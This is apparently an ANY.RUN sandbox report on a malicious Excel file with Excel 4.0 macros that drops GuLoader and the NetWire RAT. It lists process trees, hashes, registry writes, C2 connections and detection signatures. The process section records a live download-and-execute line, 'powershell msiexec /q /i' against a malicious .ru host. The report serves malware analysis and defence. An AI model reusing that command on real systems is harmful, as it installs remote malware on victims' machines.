File name:

bad.xls

Full analysis: https://app.any.run/tasks/bf804d8e-dd6d-410a-a5a3-c6d36f2fa06d
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Analysis date: March 30, 2020, 01:21:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
exe-to-msi
trojan
loader
guloader
rat
netwire
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows-Benutzer, Last Saved By: DoNt HaVe, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Oct 22 08:10:34 2019, Last Saved Time/Date: Thu Mar 19 16:56:36 2020, Security: 0
MD5:

67DDCA4FF283C339BD9FC5E7B0BAA5FA

SHA1:

C33AE7108E38E9B4F6C7257BEB9E084DCDE87ECF

SHA256:

10A82C441E89A4E2815D1E5006AACF3CF57F414D1B99A893E7A34A37108A1A52

SSDEEP:

12288:DSb184Qxo3+M++OhnsmPjpMoflTT7eiZ76wjx+OCIvLbizbJ:DSNOM+jTryihFetWzG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 3072)
    • Changes the autorun value in the registry

      • ieinstal.exe (PID: 3900)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3072)
    • Uses Microsoft Installer as loader

      • powershell.exe (PID: 3872)
    • GULOADER was detected

      • ieinstal.exe (PID: 3900)
    • NETWIRE was detected

      • ieinstal.exe (PID: 3900)
    • Connects to CnC server

      • ieinstal.exe (PID: 3900)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3872)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2376)
      • ieinstal.exe (PID: 3900)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2376)
    • Reads Internet Cache Settings

      • ieinstal.exe (PID: 3900)
      • msiexec.exe (PID: 2376)
    • Connects to unusual port

      • ieinstal.exe (PID: 3900)
  • INFO

    • Starts application with an unusual extension

      • msiexec.exe (PID: 2376)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3072)
    • Application was dropped or rewritten from another process

      • MSI89FB.tmp (PID: 2436)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Windows-Benutzer
LastModifiedBy: DoNt HaVe
Software: Microsoft Excel
CreateDate: 2019:10:22 07:10:34
ModifyDate: 2020:03:19 16:56:36
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Sheet2
  • Sheet3
  • Sheet1
  • Macro1
HeadingPairs:
  • Worksheets
  • 3
  • Excel 4.0 Macros
  • 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs powershell.exe no specs msiexec.exe no specs msiexec.exe msi89fb.tmp no specs #GULOADER ieinstal.exe

Process information

PID
CMD
Path
Indicators
Parent process
2376C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2436"C:\Windows\Installer\MSI89FB.tmp"C:\Windows\Installer\MSI89FB.tmpmsiexec.exe
User:
admin
Company:
ALKALISEREDE
Integrity Level:
MEDIUM
Description:
SHUTTER
Exit code:
0
Version:
1.00.0009
Modules
Images
c:\windows\installer\msi89fb.tmp
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
3072"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3872powershell msiexec /q /i http://binexeupload.ru/unmodifiedness.msiC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3900"C:\Windows\Installer\MSI89FB.tmp"C:\Program Files\internet explorer\ieinstal.exe
MSI89FB.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer Add-on Installer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\msvbvm60.dll
c:\program files\internet explorer\ieinstal.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
4048"C:\Windows\system32\msiexec.exe" /q /i http://binexeupload.ru/unmodifiedness.msiC:\Windows\system32\msiexec.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
1 123
Read events
976
Write events
124
Delete events
23

Modification events

(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:np1
Value:
6E703100000C0000010000000000000000000000
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(3072) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
3
Suspicious files
5
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3072EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR6C6E.tmp.cvr
MD5:
SHA256:
3872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\58U915MRCMP7F3UDA415.temp
MD5:
SHA256:
2376msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFC6E702BE26387734.TMP
MD5:
SHA256:
2376msiexec.exeC:\Config.Msi\a68910.rbs
MD5:
SHA256:
2376msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF9CB0CB7FAFF551C7.TMP
MD5:
SHA256:
2376msiexec.exeC:\Windows\Installer\MSI89FB.tmpexecutable
MD5:44744393736476EA5EAFF80B24B82F02
SHA256:B71F954A6371076F9C87B1005208BF5E712806AF1F5E037B5EEAA6AADAC6D7FB
3872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3B712DE36DC1672EC51A90C5EE31744F
SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1
2376msiexec.exeC:\Windows\Installer\a6890f.ipibinary
MD5:C02FA018D997A1FD54A473DE0864D155
SHA256:3D2E60043D3F341E81BAB374E3C1FA2DE253277A769244CDC801B0ABC3CB22D5
2376msiexec.exeC:\Windows\Installer\MSI8620.tmpexecutable
MD5:ECD1E0DAED0D11FAE60B5200B2757B36
SHA256:92DD50388595C86C0A87639A566B9E44D636621CFF94180EDD59AA28AC169BDA
2376msiexec.exeC:\Windows\Installer\MSI896D.tmpbinary
MD5:818458401F2C917DF1902262844AD701
SHA256:F02B07F41FC3D19DC8F3C65260356CA96E492185E7AB27AAAA7C7E075293590F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
2
Threats
8

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2376
msiexec.exe
213.219.212.206:80
binexeupload.ru
JSC Digital Network
RU
malicious
3900
ieinstal.exe
213.219.212.206:80
binexeupload.ru
JSC Digital Network
RU
malicious
3900
ieinstal.exe
79.124.8.7:1986
Transact Payment Services Group - Bulgaria EOOD
BG
malicious

DNS requests

Domain
IP
Reputation
binexeupload.ru
  • 213.219.212.206
malicious
stubbackup.ru
  • 213.219.212.206
malicious

Threats

PID
Process
Class
Message
2376
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
2376
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3900
ieinstal.exe
A Network Trojan was detected
MALWARE [PTsecurity] EJNT_Loader
3900
ieinstal.exe
A Network Trojan was detected
MALWARE [PTsecurity] Netwire.RAT
4 ETPRO signatures available at the full report
No debug info